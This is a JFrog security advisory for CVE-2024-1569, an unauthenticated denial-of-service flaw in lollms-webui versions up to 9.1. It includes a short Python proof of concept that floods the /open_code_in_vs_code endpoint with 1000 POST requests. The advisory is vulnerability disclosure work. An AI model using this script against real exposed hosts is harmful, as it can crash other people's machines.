JFrog Security Research
< Back

JFSA-2024-001028813 - lollms-webui resource consumption DoS

CVE-2024-1569 | CVSS 5.3

JFrog Severity:medium

Discovered ByNaveh Racovskyof the JFrog Security Research Team

Published 15 Apr, 2024 | Last updated 15 Apr, 2024

Unrestricted resource consumption in lollms-webui leads to denial of service

parisneo/lollms-webui

(,9.1], Fixed in 9.2

The /open_code_in_vs_code endpoint is open for access on a network level without authentication when the application is running exposed to the network (for example, by using --host 0.0.0.0, this could lead to a denial of service attack, which can crash the entire host machine. The attack happens by repeatedly sending HTTP POST requests to the /open_code_in_vs_code path. This leads to visual studio code repeatedly outside of the program, thus affecting the machine outside the program scope. Other endpoints are open to similar attacks and may be exploited similarly to this vulnerability.

// PoC.py
import requests

IP_ADDRESS = "aaa.bbb.ccc.ddd"
PORT = 9600

for i in range(1000):
    data = {
        "code": "a",
        "discussion_id": f"{i}",
        "message_id": f"{i}",
    }
    response = requests.post(f"http://{IP_ADDRESS}:{str(PORT)}/open_code_in_vs_code", json=data)
    print(i, response.json())

No mitigations are supplied for this issue

Advisory

< Back